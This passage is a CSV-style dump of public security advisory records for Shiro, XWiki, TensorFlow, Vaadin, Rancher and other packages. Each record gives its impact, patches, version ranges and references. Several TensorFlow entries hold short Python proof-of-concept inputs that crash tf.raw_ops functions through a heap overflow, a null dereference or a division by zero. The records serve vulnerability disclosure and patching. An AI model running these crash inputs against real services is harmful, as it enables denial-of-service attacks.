'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shiro:shiro-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1957'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shiro'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r17f371fc89d34df2d0c8131473fbc68154290e1be238895648f5a1e6%40%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb3982edf8bc8fcaa7a308e25a12d294fb4aac1f1e9d4e14fda639e77@%3Cdev.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc64fb2336683feff3580c3c3a8b28e80525077621089641f2f386b63@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/04/msg00014.html'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T20:05:12Z', 'nvd_published_at': '2020-03-25T16:15:00Z'}" +1.4.0,GHSA-76mp-659p-rw65,2022-10-05T17:19:33Z,2021-05-18T18:36:21Z,,['CVE-2021-32620'],XWiki users registered with email verification can self re-activate their disabled accounts,"### Impact +A user disabled on a wiki using email verification for registration can re-activate himself by using the activation link provided for his registration. + +### Patches +The problem has been patched in the following versions of XWiki: 11.10.13, 12.6.7, 12.10.2, 13.0. + +### Workarounds +It's possible to workaround the issue by resetting the `validkey` property of the disabled XWiki users. This can be done by editing the user profile with object editor. + +### References +https://jira.xwiki.org/browse/XWIKI-17942 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Jira](http://jira.xwiki.org) +* Email us at [Security mailing-list](mailto:security@xwiki.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.6'}, {'fixed': '11.10.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0'}, {'fixed': '12.6.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.10.0'}, {'fixed': '12.10.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-76mp-659p-rw65'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32620'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/f9a677408ffb06f309be46ef9d8df1915d9099a4'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-commons'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-17942'}]","{'cwe_ids': ['CWE-285', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T16:36:02Z', 'nvd_published_at': '2021-05-28T21:15:00Z'}" +1.4.0,GHSA-9xh4-23q4-v6wr,2021-05-18T17:28:58Z,2021-05-21T14:26:35Z,,['CVE-2021-29583'],Heap buffer overflow and undefined behavior in `FusedBatchNorm`,"### Impact +The implementation of `tf.raw_ops.FusedBatchNorm` is vulnerable to a heap buffer overflow: + +```python +import tensorflow as tf + +x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) +scale = tf.constant([0.0], shape=[1], dtype=tf.float32) +offset = tf.constant([0.0], shape=[1], dtype=tf.float32) +mean = tf.constant([0.0], shape=[1], dtype=tf.float32) +variance = tf.constant([0.0], shape=[1], dtype=tf.float32) +epsilon = 0.0 +exponential_avg_factor = 0.0 +data_format = ""NHWC"" +is_training = False + +tf.raw_ops.FusedBatchNorm( + x=x, scale=scale, offset=offset, mean=mean, variance=variance, + epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, + data_format=data_format, is_training=is_training) +``` + +If the tensors are empty, the same implementation can trigger undefined behavior by dereferencing null pointers: + +```python +import tensorflow as tf +import numpy as np + +x = tf.zeros([10, 10, 10, 1], dtype=tf.float32) +scale = tf.constant([], shape=[0], dtype=tf.float32) +offset = tf.constant([], shape=[0], dtype=tf.float32) +mean = tf.constant([], shape=[0], dtype=tf.float32) +variance = tf.constant([], shape=[0], dtype=tf.float32) +epsilon = 0.0 +exponential_avg_factor = 0.0 +data_format = ""NHWC"" +is_training = False + +tf.raw_ops.FusedBatchNorm( + x=x, scale=scale, offset=offset, mean=mean, variance=variance, + epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, + data_format=data_format, is_training=is_training) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/57d86e0db5d1365f19adcce848dfc1bf89fdd4c7/tensorflow/core/kernels/fused_batch_norm_op.cc) fails to validate that `scale`, `offset`, `mean` and `variance` (the last two only when required) all have the same number of elements as the number of channels of `x`. This results in heap out of bounds reads when the buffers backing these tensors are indexed past their boundary. + +If the tensors are empty, the validation mentioned in the above paragraph would also trigger and prevent the undefined behavior. + +### Patches +We have patched the issue in GitHub commit [6972f9dfe325636b3db4e0bc517ee22a159365c0](https://github.com/tensorflow/tensorflow/commit/6972f9dfe325636b3db4e0bc517ee22a159365c0). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9xh4-23q4-v6wr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29583'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/6972f9dfe325636b3db4e0bc517ee22a159365c0'}]","{'cwe_ids': ['CWE-125', 'CWE-476', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T17:28:58Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-p826-8vhq-h439,2021-05-19T17:41:45Z,2021-05-06T15:27:12Z,,['CVE-2021-31411'],Insecure temporary directory usage in frontend build functionality of Vaadin 14 and 15-19,"Insecure temporary directory usage in frontend build functionality of `com.vaadin:flow-server` versions 2.0.9 through 2.5.2 (Vaadin 14.0.3 through Vaadin 14.5.2), 3.0 prior to 6.0 (Vaadin 15 prior to 19), and 6.0.0 through 6.0.5 (Vaadin 19.0.0 through 19.0.4) allows local users to inject malicious code into frontend resources during application rebuilds. + +- https://vaadin.com/security/cve-2021-31411","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.3'}, {'fixed': '14.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 14.5.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '19.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.0.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-p826-8vhq-h439'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31411'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/10640'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31411'}]","{'cwe_ids': ['CWE-379'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T17:54:40Z', 'nvd_published_at': '2021-05-05T19:15:00Z'}" +1.4.0,GHSA-88jf-7rch-32qc,2023-08-30T11:23:31Z,2021-05-18T20:31:18Z,,['CVE-2020-7668'],github.com/unknwon/cae Path Traversal vulnerability,"The ExtractTo function doesn't securely escape file paths in zip archives which include leading or non-leading "".."". This allows an attacker to add or replace files system-wide.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/unknwon/cae'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7668'}, {'type': 'WEB', 'url': 'https://github.com/unknwon/cae/commit/07971c00a1bfd9dc171c3ad0bfab5b67c2287e11'}, {'type': 'PACKAGE', 'url': 'https://github.com/unknwon/cae'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0041'}, {'type': 'WEB', 'url': 'https://snyk.io/research/zip-slip-vulnerability'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUNKNWONCAETZ-570384'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T20:32:28Z', 'nvd_published_at': '2020-06-23T19:38:00Z'}" +1.4.0,GHSA-x67x-98x7-wv26,2023-09-07T20:15:05Z,2021-05-07T16:14:56Z,,['CVE-2020-7605'],OS Command Injection in gulp-tape,gulp-tape through 1.0.0 allows execution of arbitrary commands. It is possible to inject arbitrary commands as part of `gulp-tape` options.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gulp-tape'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7605'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GULPTAPE-560124'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T19:21:34Z', 'nvd_published_at': '2020-03-15T22:15:00Z'}" +1.4.0,GHSA-2382-qx5h-rvqh,2022-11-17T18:32:51Z,2021-05-07T15:52:56Z,,['CVE-2016-11023'],SQL Injection in odata4j,"odata4j 0.7.0 allows ExecuteCountQueryCommand.java SQL injection. NOTE, this product is apparently discontinued.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.odata4j:odata4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.odata4j:odata4j-dist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.odata4j:odata4j-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-11023'}, {'type': 'WEB', 'url': 'https://groups.google.com/d/msg/odata4j-discuss/_lBwwXP30g0/Av6zkZMdBwAJ'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T21:58:15Z', 'nvd_published_at': '2020-03-30T20:15:00Z'}" +1.4.0,GHSA-xqfj-35wv-m3cr,2021-05-18T22:02:37Z,2021-05-21T14:23:12Z,,['CVE-2021-29541'],Null pointer dereference in `StringNGrams`,"### Impact +An attacker can trigger a dereference of a null pointer in `tf.raw_ops.StringNGrams`: + +```python +import tensorflow as tf + +data=tf.constant([''] * 11, shape=[11], dtype=tf.string) + +splits = [0]*115 +splits.append(3) +data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) + +tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', + ngram_widths=[7,6,11], + left_pad='ABCDE', right_pad=b'ZYXWVU', + pad_width=50, preserve_short_sequences=True) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L67-L74) does not fully validate the `data_splits` argument. This would result in [`ngrams_data`](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L106-L110) to be a null pointer when the output would be computed to have 0 or negative size. + +Later writes to the output tensor would then cause a null pointer dereference. + +### Patches +We have patched the issue in GitHub commit [ba424dd8f16f7110eea526a8086f1a155f14f22b](https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xqfj-35wv-m3cr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29541'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:02:37Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-xhg2-rvm8-w2jh,2023-09-18T20:27:11Z,2021-05-18T15:42:40Z,,['CVE-2019-13209'],Rancher Vulnerable to Cross-site Request Forgery (CSRF),"Rancher 2 through 2.2.4 is vulnerable to a Cross-Site Websocket Hijacking attack that allows an exploiter to gain access to clusters managed by Rancher. The attack requires a victim to be logged into a Rancher server, and then to access a third-party site hosted by the exploiter. Once that is accomplished, the exploiter is able to execute commands against the cluster's Kubernetes API with the permissions and identity of the victim.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.16'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-13209'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/commit/0ddffe484adccb9e37d9432e8e625d8ebbfb0088'}, {'type': 'WEB', 'url': 'https://forums.rancher.com/t/rancher-release-v2-2-5-addresses-rancher-cve-2019-13209/14801'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}]","{'cwe_ids': ['CWE-352', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T16:37:55Z', 'nvd_published_at': '2019-09-04T14:15:00Z'}" +1.4.0,GHSA-3qgw-p4fm-x7gf,2021-05-17T23:07:59Z,2021-05-21T14:27:45Z,,['CVE-2021-29594'],Division by zero in TFLite's convolution code,"### Impact +TFLite's [convolution code](https://github.com/tensorflow/tensorflow/blob/09c73bca7d648e961dd05898292d91a8322a9d45/tensorflow/lite/kernels/conv.cc) has multiple division where the divisor is controlled by the user and not checked to be non-zero. For example: + +```cc +const int input_size = NumElements(input) / SizeOfDimension(input, 0); +``` + +### Patches +We have patched the issue in GitHub commit [ff489d95a9006be080ad14feb378f2b4dac35552](https://github.com/tensorflow/tensorflow/commit/ff489d95a9006be080ad14feb378f2b4dac35552). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3qgw-p4fm-x7gf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29594'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ff489d95a9006be080ad14feb378f2b4dac35552'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T23:07:59Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-w8cj-mvf9-mpc9,2021-04-07T18:29:19Z,2021-05-06T18:53:29Z,,['CVE-2020-28925'],OS Command injection in Bolt,"Bolt before 3.7.2 does not restrict filter options in a Request in the Twig context, and is therefore inconsistent with the ""How to Harden Your PHP for Better Security"" guidance.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'bolt/bolt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28925'}, {'type': 'WEB', 'url': 'https://github.com/bolt/bolt/commit/c0cd530e78c2a8c6d71ceb75b10c251b39fb923a'}, {'type': 'WEB', 'url': 'https://github.com/bolt/bolt/compare/3.7.1...3.7.2'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T18:29:19Z', 'nvd_published_at': '2020-12-30T19:15:00Z'}" +1.4.0,GHSA-c968-pq7h-7fxv,2021-05-18T23:22:10Z,2021-05-21T14:21:39Z,,['CVE-2021-29522'],Division by 0 in `Conv3DBackprop*`,"### Impact +The `tf.raw_ops.Conv3DBackprop*` operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: + +```python +import tensorflow as tf + +input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) +filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) +out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) + +tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) +``` +```python +import tensorflow as tf + +input_sizes = tf.constant([1], shape=[1, 1, 1, 1, 1], dtype=tf.float32) +filter_tensor = tf.constant([0, 0, 0, 1, 0], shape=[5], dtype=tf.int32) +out_backprop = tf.constant([], shape=[1, 1, 1, 1, 0], dtype=tf.float32) + +tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/a91bb59769f19146d5a0c20060244378e878f140/tensorflow/core/kernels/conv_grad_ops_3d.cc#L430-L450) does not check that the divisor used in computing the shard size is not zero: + +```cc + const int64 size_A = output_image_size * dims.out_depth; + const int64 size_B = filter_total_size * dims.out_depth; + const int64 size_C = output_image_size * filter_total_size; + const int64 work_unit_size = size_A + size_B + size_C; + ... + const size_t shard_size = + use_parallel_contraction + ? 1 + : (target_working_set_size + work_unit_size - 1) / work_unit_size; +``` + +Thus, if attacker controls the input sizes, they can trigger a denial of service via a division by zero error. + +### Patches +We have patched the issue in GitHub commit [311403edbc9816df80274bd1ea8b3c0c0f22c3fa](https://github.com/tensorflow/tensorflow/commit/311403edbc9816df80274bd1ea8b3c0c0f22c3fa). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 